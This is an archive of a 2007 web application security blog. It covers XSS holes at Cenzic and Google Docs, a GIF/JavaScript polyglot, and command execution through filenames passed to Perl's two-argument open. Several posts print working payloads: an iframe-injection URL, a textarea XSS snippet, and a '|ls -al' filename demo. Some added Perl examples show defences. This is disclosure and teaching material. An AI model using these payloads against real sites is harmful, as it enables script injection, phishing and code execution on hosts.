web application security lab

Archive for June, 2007

NOSCRIPT on Cenzic

Thursday, June 28th, 2007

Erwin Geirnaert sent me an amusing email today about one of the links that Ronald threw up. Yes, Cenzic has had a number of XSS holes, and yes, they have tried to fix them, but they have had some problems in their fixes. Here’s Erwin’s email:

I followed this link from http://www.0x000000.com/?i=372:
http://www.cenzic.com/products_services/download_hailstorm.php?camp=%22%3E%3Ciframe%20src=http://ha.ckers.org/scriptlet.html%20%3C

The HTML source:

<a href="/forms/hailstorm.php?id=3&camp=\"><iframe src=http://ha.ckers.org/NOSCRIPTlet.html <"><img src="../images/products_services/btn_hailstorm_starter.gif" alt="Hailstorm Starter: Try for 45 Days" width="455" height="39" border="0"></a><br>

<a href="/forms/hailstorm.php?id=2&camp=\"><iframe src=http://ha.ckers.org/NOSCRIPTlet.html <"><img src="../images/products_services/btn_try_hailstorm_7days.gif" alt="Hailstorm Core: Try for 7 Days" width="455" height="39" border="0"></a><br>

<a href="/forms/hailstorm.php?id=1&camp=\"><iframe src=http://ha.ckers.org/NOSCRIPTlet.html <"><img src="../images/products_services/btn_buy_hailstorm.gif" alt="Hailstorm Core: Buy Today" width="455" height="39" border="0"></a><br>

So a page with the name NOSCRIPTlet.html will work, no?

Erwin was absolutely right, aaaabsolutely right. Cenzic attempted to mitigate the risk by changing the word “script” to “NOSCRIPT”, which doesn’t do much in this case other than change the location where the vector lives. So I went ahead and created exactly that file (NOSCRIPTlet.html) to prove the point. You cannot do simple substitutions like that and assume they will break every vector. This all comes in reaction to some rather scary patents they issued that appear to break everyone else’s ability to work in the industry. Not good.
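An added example (mine, not Cenzic’s code) of why the substitution fails: it models the two changes visible in the quoted HTML source (a backslash before the quote and “script” renamed) next to attribute encoding, applied to the camp= value from the post. Function names and the breakout check are mine.

```perl
#!/usr/bin/perl
# Added example, not Cenzic's code: a blacklist word swap versus HTML
# attribute encoding, applied to the camp= value quoted in the post.
use strict;
use warnings;

# Constructed input: the decoded query-string value from the link above.
my $camp = '"><iframe src=http://ha.ckers.org/scriptlet.html <';

# Modelled on what the page source shows: a backslash in front of the
# quote (which HTML ignores) and the word "script" swapped for NOSCRIPT.
sub blacklist_fix {
    my ($s) = @_;
    $s =~ s/"/\\"/g;
    $s =~ s/script/NOSCRIPT/gi;
    return $s;
}

# What actually neutralises the vector: encode every character that has
# meaning inside an attribute value, so the attribute cannot be closed early.
sub attr_encode {
    my ($s) = @_;
    my %map = ('&' => '&amp;', '<' => '&lt;', '>' => '&gt;',
               '"' => '&quot;', "'" => '&#39;');
    $s =~ s/([&<>"'])/$map{$1}/g;
    return $s;
}

# Builds the anchor tag the way the page does.
sub render_link {
    my ($value) = @_;
    return qq{<a href="/forms/hailstorm.php?id=3&camp=$value">};
}

# Review check: a quote followed by '>' and a fresh tag inside the rendered
# attribute means user input closed the attribute and started new markup.
sub breaks_out {
    my ($html) = @_;
    return $html =~ /"\s*>\s*<[a-zA-Z]/ ? 1 : 0;
}

my %fixes = (blacklist => \&blacklist_fix, encode => \&attr_encode);
for my $name (sort keys %fixes) {
    my $html = render_link($fixes{$name}->($camp));
    printf "%-9s closes the attribute early: %s\n  %s\n",
        $name, (breaks_out($html) ? 'yes' : 'no'), $html;
}
```

The blacklist variant reproduces the exact `camp=\"><iframe src=http://ha.ckers.org/NOSCRIPTlet.html <"` seen in the page source, and the check flags it; the encoded variant keeps the whole value inside the attribute.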

Links Roundup

Wednesday, June 27th, 2007

I’m falling way behind in links that people have been sending me, so rather than post about each one, I’m doing something unprecedented on this site and throwing them all into one post. Yes, there’s lots to talk about, but I’ve been swamped over the last few weeks and will continue to be swamped for another two weeks (on a long term client engagement). So here goes:

Today christ1an launched a new aggregation website for web application security called Planet-websecurity.org. If you want to get all your web app sec news in one place, this might be a useful service for you to check out. Right now there are only 7 sites or so being culled together (this site is included) but I’m sure more will come in time.

Blogspot is vulnerable to HTML and JavaScript injection. Erwin Geirnaert emailed me about this one a while back and I was a naughty boy and didn’t post it. You want to put up a phishing site on Blogspot? Well it’s easier than you may think. No obfuscation required, just add your own JS and you’re off to the races. Bad, Google, bad.

There are many XSS vulns in Wordpress themes. This is an oldy but a goodie. I don’t use any downloaded themes, because they never go through any sort of third party review (or first party for that matter). And if you don’t want to take my word for it, check out this site. Nasty.

It’s the National Internet Safety Month in June. Do you think we’ll see any drop in identity theft? If the US government is doing campaigns on how to protect yourself, and most of us haven’t even heard about it, I think the money is probably not particularly well spent - especially considering how education doesn’t equate to a drop in fraud ratios. Why can’t I choose not to spend my tax money on things I know will fail? Wouldn’t that be nice? More info on Mustlive’s site.

Ken Clarke sent me an email a while back about how the FBI is having a bot roast. Let’s break the backbone of robots! While a cool project, I’m not sure they are going to get too far without help from the community. I’d love to see a clearing house for this stuff, a la APWG and Cloudmark. Anyone have some disc space and want to write a plugin into mod_security? I think you’d have a big reaction from the community.

Sorry for being so behind on some of this - some of this stuff is a month or more old, but it’s still interesting, and I just never found the time to write about any of it.

Blocking Bots By HTAccess

Monday, June 25th, 2007

While doing a little research into some random stuff for a client I ran into a bot that was spidering in a bad way. Within a few search results pages I found my way to a blog entry by BrontoBytes talking about blocking spiders by HTAccess. This is a pretty interesting proactive approach to stopping request level attacks, and something used commonly by mod_security, for instance. You can check out the blog entry which shows how to set up an .htaccess file to block some modern robots.

A word of caution, however, is that some of these aren’t “bad” per se - but they may be undesirable. Like Baidu is simply a Chinese robot that doesn’t obey the robots.txt file. Some might find that terrible but others might be okay with it. wget and libwww for instance just mean someone is manually interested in your robot. If you consider that bad (system level exhaustion perhaps?), then there are lots of other things you should probably be blocking too. Anyway, it’s a pretty good starter list.

Burp Proxy Call For Requests

Monday, June 25th, 2007

I just got an email from PortSwigger (the guy who built Burp Proxy). If you haven’t used this tool in your manual assessments you are really missing out. It’s actually got me some of the best results I’ve ever had. Very sexy. Anyway, he is now taking requests for his next version, and if you have ever used this tool and found anything particularly fragile or annoying, now is your time to make your suggestions.

This is just to let you know that work is underway on the next release of Burp Suite, which should be available later this year. This will be a major upgrade with lots of new features in all of the tools.

At this point, it would be good to hear any other feature requests that you may have, however large or small. Please reply to me directly or join the discussion here:

http://blog.portswigger.net/

and I’ll address as many as I can.

I’d be grateful if you would pass this email on to anyone else in your team who uses Burp Suite.

I think we should all take the time to make some suggestions as to how we could make this tool even more useful in the future. I appreciate that he’s taking the time and energy to create it, because it’s really one of the most powerful and easy to use applications out there. Combined with the SwitchProxy plugin in Firefox, it’s almost seamless.

Hiding JS in Valid Images

Saturday, June 23rd, 2007

Matteo Carli wrote me today to discuss some RFI and JS stuff. We’ve been talking a lot about what uploaded images can do lately, but embedded JS is an interesting one for a few reasons. If you needed a drop for a payload, for instance. Here’s part of his email (edited slightly for formatting):

So I created a simple PHP test like this:

<?php include 'myimage.gif'; ?>

and the result is like this. An image like this can be saved on a hosting site (like imageshack) for use in an RFI attack.

PHP is not the only language it is possible to embed into an image; JavaScript can be embedded too, yes it is! There are two big problems with JS and GIF:
* special binary chars
* GIF header

I’ve created a special GIF image.

To keep the GIF header as in the original I’ve added “=1” so the JS engine does not consider the header chars an undefined variable. To escape special chars I’ve used the long comment “/*” and “*/”. This image is a valid GIF and valid JS that can be used as a script source like: <script src=myimage.gif>

I think it’s useful for evading filters and hosting malicious JS code on wide, well-known image hosting sites.

The =1 thing is pretty clever and indeed simple things like that can stop a lot of errors from happening (IE is often more strict about that than Firefox but your mileage may vary). Anyway, interesting trick. Nice work by Matteo!
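An added example (mine, not Matteo’s code) from the upload-handling side: it parses the GIF header the way a browser does and flags a file whose header bytes also read as the start of a JavaScript program, which is exactly what the “=1” and “/*” tricks above require. The function name, the size thresholds and the sample bytes are my own constructions.

```perl
#!/usr/bin/perl
# Added example, not Matteo's code: an upload-time check that refuses a
# "GIF" whose header bytes double as the start of a JavaScript program.
# The size thresholds are assumptions for this demo, not a GIF rule.
use strict;
use warnings;

# Returns the reasons a blob should be rejected; an empty list means it
# looks like an ordinary GIF.
sub gif_polyglot_reasons {
    my ($blob) = @_;
    my @why;
    return ('truncated header') if length($blob) < 13;
    my $sig = substr($blob, 0, 6);
    return ('not a GIF signature') unless $sig eq 'GIF87a' || $sig eq 'GIF89a';

    # The logical screen descriptor follows the signature: width and height
    # as 16-bit little-endian values. Writing "=1" there, as in the email,
    # makes the width the ASCII codes of '=' and '1': 0x313D = 12605.
    my ($w, $h) = unpack('v v', substr($blob, 6, 4));
    push @why, "implausible logical screen ${w}x${h}"
        if $w == 0 || $h == 0 || $w > 8192 || $h > 8192;

    # For the file to parse as JavaScript the signature must continue as an
    # expression, so an operator follows it and the binary part is then
    # wrapped in a /* ... */ comment; neither belongs in a GIF header.
    my $after = substr($blob, 6, 64);
    push @why, 'signature is followed by a JS operator' if $after =~ /^[=;,(\[]/;
    push @why, 'JS block comment opener in the header region' if $after =~ m{/\*};
    return @why;
}

# Constructed samples: a genuine 1x1 GIF and the header shape described in
# the email (no script body is needed to exercise the check).
my $real = 'GIF89a' . pack('v v', 1, 1) . "\x80\x00\x00"      # descriptor
         . "\x00\x00\x00\xff\xff\xff"                          # 2-colour table
         . ",\x00\x00\x00\x00\x01\x00\x01\x00\x00"             # image descriptor
         . "\x02\x02\x44\x01\x00;";                            # 1 pixel, trailer
my $poly = 'GIF89a=1;/*' . "\x80\x00\x00\xff\x00\xff" . '*/';

for my $sample ([real => $real], [polyglot => $poly]) {
    my ($label, $bytes) = @$sample;
    my @why = gif_polyglot_reasons($bytes);
    printf "%-8s %s\n", $label, (@why ? 'REJECT: ' . join('; ', @why) : 'ok');
}
```

Re-encoding every upload with an image library (which keeps only what is needed to redraw the pixels) is the stronger control; this check is a cheap filter to run in front of it.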

Blackhat Head’s Up

Friday, June 22nd, 2007

Blackhat is coming in about a month and a half. Normally I don’t even talk about conferences until a week or so before I arrive, but Blackhat is a bigger event than most and there’s almost always a lot more going on there than the other cons. So, for those who are interested, here’s what I know and here’s what I’ll be attending.

Firstly, although Dan Kaminsky’s speech doesn’t look like it, I talked with him last night, and he will actually be doing a pretty relevant speech to a lot of the stuff I talk about here, specifically anti-DNS pinning and fingerprinting applications. Definitely worth sitting through, even though I’d love to also see Jon Callas’ speech on traffic analysis - so I may have a spy go to that speech to take notes for me.

Of course I’ll be attending Jeremiah Grossman’s talk on Intranet hacking without JS - I maaay also make a special guest appearance during the talk if I can get some demo code together in the next month. No promises. If people really twist my arm I may sign some books too.

If I had to pick one of the two speeches that Billy Hoffman will be doing I’d probably choose the one on web worms because I think that is far more cutting edge and new, as only a few web worms have surfaced. Although at the same time as that speech is Ariel Waissbein’s speech on ways to dynamically stop attacks using morphing web applications (a topic near and dear to me). So as a result I’ll probably end up going to Billy’s other talk on Premature Ajax-ultation instead of the worm one. I gotta show my support!

I’ll definitely be going to Window Snyder’s talk on Making and Breaking the browser. If nothing else it’ll be interesting to hear her take on it. However, I also want to hit Stephen Patton’s power talk on social networking data mining, so I might float back and forth between those two talks.

I’ll probably hit up Scott Stender’s talk on blind security testing instead of David Byrne’s talk on anti-DNS pinning, because I don’t think there’s anything new in that speech, even though it’s definitely on-topic. After that David Coffey’s speech on creating a shoestring application security practice might be fun. I always like doing things on the cheap.

Lastly, if I’m not totally burnt out on Blackhat I’ll probably go to Rohyt Belani’s talk on the difficulty of intranet forensics (another topic near and dear to me because we are getting into more expert witness gigs). Plus I think Rohyt will give a good talk because it’s all anecdotes.

And when the doors close is when the party begins - namely the Breach sponsored OWASP/WASC party. If you haven’t already RSVP’d you may have trouble getting in as I heard 200+ people have already asked to come. I don’t have any idea how they are going to fit that many people into the Shadow Bar, so they may have to end up moving it, or spilling out onto the casino floor. If anyone hears about any other good parties, please let me know. Anyway, it’ll be fun and I hope to see a lot of you there!

Code Execution Through Filenames in Uploads

Wednesday, June 20th, 2007

I was up well before I should have been this morning and I was thinking more about file uploads. Remember back in the day when you inadvertently named a file with a dash or a slash in it? Oh, the joys of trying to clean up files on *Nix systems that had a slash in them. We learned our lesson and moved on with life. Now we are all grown and have a different reason to create files with bad chars in them. This time we want to exploit a file upload. So I created a script in Perl that simply looks for a file and opens it for reading:

#!/usr/bin/perl
# Deliberately uses the two-argument form of open(), which treats a
# filename beginning or ending with '|' as a command to run.

opendir(DIR, ".") || die "Can't open dir: $!\n";
# every regular file in the current directory whose name contains "ls"
@files = grep { /ls/ && -f "./$_" } readdir(DIR);
foreach $file (@files) {
  open (FILE, "$file");   # two-argument open: "|ls -al" becomes a pipe, not a path
  print while (<FILE>);
  close FILE;
}
closedir DIR;

Now here is me showing what is inside the file I named “|ls -al”, then showing what is inside the directory, and lastly, running the code:

[haX0r]$ cat \|ls\ -al
This information is within the file |ls -al
[haX0r]$ ls -al
total 08
drwxr-xr-x 2 haX0r haX0r 512 Jun 19 15:43 .
drwxr-xr-x 37 haX0r haX0r 4096 Jun 18 12:59 ..
-rw-r--r-- 1 haX0r haX0r 247 Jun 19 15:46 test.pl
-rw-r--r-- 1 haX0r haX0r 0 Jun 19 15:43 |ls -al
[haX0r]$ perl test.pl
[haX0r]$ total 14
drwxr-xr-x 2 haX0r haX0r 512 Jun 19 15:43 .
drwxr-xr-x 37 haX0r haX0r 4096 Jun 18 12:59 ..
-rw-r--r-- 1 haX0r haX0r 247 Jun 19 15:46 test.pl
-rw-r--r-- 1 haX0r haX0r 0 Jun 19 15:43 |ls -al

Immediately after running the program it ran the filename instead of opening the file. So herein lies another interesting place to use that arbitrary image name creation program I built (I guess it’s not just for XSS after all - but actual code execution on the host machine). Here would be an example. Encoding spaces might cause problems but I’m sure we can work around that in most cases. Pretty trivial and pretty nasty.
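An added example (mine, not the post’s test.pl) of the fix on the reading side: the same directory scan using the three-argument open, where the mode is separate from the name so “|ls -al” is a path and never a pipe, plus a conservative allowlist for the names an upload handler stores. Function names are mine, and the script writes its sample file into a temp directory so it runs anywhere.

```perl
#!/usr/bin/perl
# Added example, not the post's test.pl: the same scan with a three-argument
# open (mode given separately, so '|' in a name cannot start a command) and
# an allowlist for names accepted from an upload.
use strict;
use warnings;
use File::Temp qw(tempdir);
use File::Spec;

# Constructed sandbox: a temp directory holding a file named "|ls -al",
# exactly as in the post, so this can be run safely anywhere.
my $dir = tempdir(CLEANUP => 1);
{
    open(my $out, '>', File::Spec->catfile($dir, '|ls -al')) or die "create: $!";
    print $out "This information is within the file |ls -al\n";
    close $out;
}

# Reads every regular file whose name matches $pattern and returns its
# content keyed by name. Because the mode is its own argument, the name is
# only ever a path: "|ls -al" is opened, not executed.
sub read_matching {
    my ($base, $pattern) = @_;
    opendir(my $dh, $base) or die "Can't open dir: $!";
    my %content;
    for my $name (readdir $dh) {
        my $path = File::Spec->catfile($base, $name);
        next unless $name =~ $pattern && -f $path;
        open(my $fh, '<', $path) or die "Can't open $name: $!";
        local $/;               # slurp the whole file
        $content{$name} = <$fh>;
        close $fh;
    }
    closedir $dh;
    return %content;
}

# For uploads, do not keep the client's name at all unless it is boring:
# a short alphanumeric name that does not start with '-' or '.', so it can
# never be read later as a pipe, an option or a hidden file.
sub safe_upload_name {
    my ($name) = @_;
    return unless defined $name && $name =~ /^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$/;
    return $name;
}

my %seen = read_matching($dir, qr/ls/);
for my $name (sort keys %seen) {
    print "[$name] => $seen{$name}";
    printf "  upload name accepted? %s\n", (defined safe_upload_name($name) ? 'yes' : 'no');
}
```

Running it prints the file’s contents under its literal name and reports that the name would be rejected by the allowlist; nothing is executed.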

Book review: Professional Pen Testing for Web Applications

Tuesday, June 19th, 2007

I don’t generally do book reviews (maybe I’ll start if I have to do this much traveling in the future - since it will give me lots of time to read). In this case, the book was really on topic, if a tad out of date. Andres Andreu wrote a book in the 2005-2006 timeframe called “Professional Pen Testing for Web Applications” (I think he could have sold another 10k copies if he had spelled out “Penetration” instead of “Pen” but that’s neither here nor there). The book is actually a really good and quick read as there are lots of pictures and examples to drive the text along.

Normally I find it tedious to get through penetration testing style books, because the authors generally only talk about one or two tools (generally nmap and insert one or two other tools here) and stick with them for the entire book. Andres does a really nice job of talking about dozens of different tools and how they are useful from a web application security perspective. One section that I found a tad cheesy though was the ethics of what you can and can’t do during an audit. I don’t know why, but I’ve always found that stuff to be obvious. For instance while it does say extortion is not okay (I hope that’s also obvious to everyone reading this), it fails to mention bribery, rubber hose cryptanalysis, intimidation, kidnapping, murder, or a host of other things that actually do work and three letter agencies worldwide have employed. So don’t go looking at that chart as saying “Andres didn’t say I couldn’t.” The chart made me and id laugh. If anyone wants to sign up for that kind of audit, just let us know. We’ve got the blowtorch and the pliers standing by. The ethics section of the book was short, and it got better quickly thereafter.

Anyway, sure, some parts of the book are out of date, as you’d expect with a book written 1-2 years ago, but a lot of the book is timeless. The general tactics put in place, how the different threat modeling works, and how you document what you find is all good information. I’ve had my own way of doing things for years, but it’s always nice to hear someone else’s perspective. The best part of the book for me, was that since it was slightly out of date, I got to hear a lot more about technologies we tend to forget about since they aren’t used that much any longer. There weren’t many blogs detailing this stuff back then to read, so this is a bit of a blast from the past. Granted, he doesn’t talk at all about a lot of the more modern stuff since it didn’t exist yet, but I found it a really interesting refresher course in the way things used to be, and the way we should probably continue to think about legacy systems.

The cons are that he hardly discusses manual assessment using things like telnet at all, focusing more on the existing tools; at least half a chapter when you add it all up is talking about buffer overflows without going into enough detail to actually show a working example in the wild; he talks quite a bit about SSL security (which really isn’t much of a problem most of the time); and it makes a big leap that you already know how to develop programs, run programs and have access to *Nix environments. That’s true in my case, and on the cover it even says “Programmer to Programmer.” Still it’s definitely not meant for a beginner with only access to Windows and no idea what Cygwin is. Overall, it was probably a four out of five star type book when it came out, but because it’s a little out of date it’s probably more like three stars now. Still, it makes a nice addition to the bookshelf, and it got my brain thinking.

Another Google XSS in Google Documents

Sunday, June 17th, 2007

Today, Hong emailed me with yet another Google XSS vulnerability. This time it is in the way Google’s filtering engines work to protect its users from malicious HTML in Google Documents. I’ve seen this exact hole a number of times in sites that allow WYSIWYG editors. Unfortunately, just because it’s rendered, it doesn’t make it safe. Things like that are also often vulnerable to iframe injection. Here’s his email, edited only for formatting.

I found a hole in the Google Docs XSS filter. Google Docs does not know how textarea works. If we inject the following HTML code into the document:

<textarea><a href=" http://www.site.com/
</textarea><script>alert('xss')</script>"></textarea>

the Google XSS filter does not filter out <script>alert('xss')</script> because it is inside an HTML tag encapsulation. But in fact the browser treats <a href="http://www.site.com/ as plain text inside the textarea, then runs the script following it.

Here is a demo.

Google has had a pretty terrible track record when it comes to these vulnerabilities, as have many other sites of this complexity, and this represents a few failings. Firstly, understanding what HTML looks like, and secondly understanding that rich HTML can jump out of itself in weird ways when you just throw user text in the middle of your page. Hopefully they fix this one quickly.
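An added example (mine, not Google’s filter) that makes the disagreement concrete: a simplified tag scanner that honours attribute quotes, the way a naive filter does, beside a simplified model of the browser tokeniser, where everything after <textarea> is text until the first </textarea> regardless of quotes. Function names are mine and the input is Hong’s payload.

```perl
#!/usr/bin/perl
# Added example, not Google's filter: why a filter that tokenises tags the
# "obvious" way disagrees with a browser about where a <textarea> ends.
use strict;
use warnings;

# Constructed payload: the markup from Hong's email.
my $html = qq{<textarea><a href=" http://www.site.com/\n}
         . qq{</textarea><script>alert('xss')</script>"></textarea>};

# Filter's view: a tag runs from '<' to the next '>' that is not inside a
# quoted attribute value. Under that rule the quote opened at href=" swallows
# </textarea><script>...</script> as part of the attribute value.
sub filter_tags {
    my ($s) = @_;
    my @tags;
    while ($s =~ /<(\/?[a-zA-Z][^\s>\/]*)((?:"[^"]*"|'[^']*'|[^>"'])*)>/g) {
        push @tags, lc $1;
    }
    return @tags;
}

# Browser's view (the tokeniser's RCDATA rule, simplified): once <textarea>
# is open, nothing is a tag until the first </textarea>, quotes included.
# Everything after that is tokenised as markup again.
sub browser_tags {
    my ($s) = @_;
    my @tags;
    pos($s) = 0;
    while ($s =~ /\G.*?<(\/?[a-zA-Z][^\s>\/]*)[^>]*>/sgc) {
        my $name = lc $1;
        push @tags, $name;
        if ($name eq 'textarea') {
            # RCDATA: skip to the end tag without interpreting anything in between
            $s =~ /\G.*?<\/textarea\s*>/sgci or last;
            push @tags, '/textarea';
        }
    }
    return @tags;
}

sub has_script { return scalar grep { $_ eq 'script' } @_ }

printf "filter sees : %s\n", join(' ', filter_tags($html));
printf "browser sees: %s\n", join(' ', browser_tags($html));
printf "script tag reaches the browser but not the filter: %s\n",
    ((has_script(browser_tags($html)) && !has_script(filter_tags($html))) ? 'yes' : 'no');
```

A filter that allows rich HTML has to track the tokeniser’s state (RCDATA for textarea and title, raw text for script and style); parsing with a real HTML parser and re-serialising the result is the dependable way to get that.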

Google/Youtube Ultimatum

Sunday, June 17th, 2007

Yesterday, christ1an published an ultimatum to Google and Youtube regarding vulnerabilities in their applications. His deal - work with him within the next few weeks or expect full disclosure on one or more vulnerabilities. From his posting:

Taking that into account I’m going to have one last try and give you two weeks from now to contact me. If you don’t, I am obliged to disclose all vulnerabilities in public.

christ1an is not the only person to voice concerns over how companies respond to vulnerability researchers and voice severe frustration based on the lack of response. It’ll be interesting to see how this one pans out, as obviously the companies are less integrated than they probably should be, and even through all of the vulnerabilities in Google like the most recent Google vulnerability found by Mustlive.